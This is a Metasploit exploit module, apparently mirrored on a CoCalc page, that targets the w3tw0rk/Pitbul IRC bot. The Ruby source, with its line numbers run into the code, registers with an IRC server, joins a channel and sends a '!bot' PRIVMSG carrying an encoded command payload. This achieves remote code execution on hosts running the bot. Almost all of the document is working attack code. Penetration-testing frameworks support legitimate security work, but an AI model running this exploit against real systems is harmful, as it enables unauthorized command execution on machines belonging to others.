CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/w3tw0rk_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',13'Description' => %q{14This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.15},16'Author' =>17[18'Jay Turla'19],20'License' => MSF_LICENSE,21'References' =>22[23[ 'OSVDB', '120384' ],24[ 'EDB', '36652' ]25],26'Platform' => %w{ unix win },27'Arch' => ARCH_CMD,28'Payload' =>29{30'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf31'DisableNops' => true,32'Compat' =>33{34'PayloadType' => 'cmd'35}36},37'Targets' =>38[39[ 'w3tw0rk', { } ]40],41'Privileged' => false,42'DisclosureDate' => '2015-06-04',43'DefaultTarget' => 0))4445register_options(46[47Opt::RPORT(6667),48OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),49OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),50OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])51])52end5354def post_auth?55true56end5758def check59connect6061res = register(sock)62if res =~ /463/ || res =~ /464/63vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")64return Exploit::CheckCode::Unknown65end6667res = join(sock)68if !res =~ /353/ && !res =~ /366/69vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")70return Exploit::CheckCode::Unknown71end7273quit(sock)74disconnect7576if res =~ /auth/ && res =~ /logged in/77Exploit::CheckCode::Vulnerable78else79Exploit::CheckCode::Safe80end81end8283def send_msg(sock, data)84sock.put(data)85data = ""86begin87read_data = sock.get_once(-1, 1)88while !read_data.nil?89data << read_data90read_data = sock.get_once(-1, 1)91end92rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e93elog(e)94end9596data97end9899def register(sock)100msg = ""101102if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?103msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"104end105106if datastore['NICK'].length > 9107nick = rand_text_alpha(9)108print_error("The nick is longer than 9 characters, using #{nick}")109else110nick = datastore['NICK']111end112113msg << "NICK #{nick}\r\n"114msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"115116send_msg(sock,msg)117end118119def join(sock)120join_msg = "JOIN #{datastore['CHANNEL']}\r\n"121send_msg(sock, join_msg)122end123124def w3tw0rk_command(sock)125encoded = payload.encoded126command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"127send_msg(sock, command_msg)128end129130def quit(sock)131quit_msg = "QUIT :bye bye\r\n"132sock.put(quit_msg)133end134135def exploit136connect137138print_status("#{rhost}:#{rport} - Registering with the IRC Server...")139res = register(sock)140if res =~ /463/ || res =~ /464/141print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")142return143end144145print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")146res = join(sock)147if !res =~ /353/ && !res =~ /366/148print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")149return150end151152print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")153w3tw0rk_command(sock)154155quit(sock)156disconnect157end158end159160161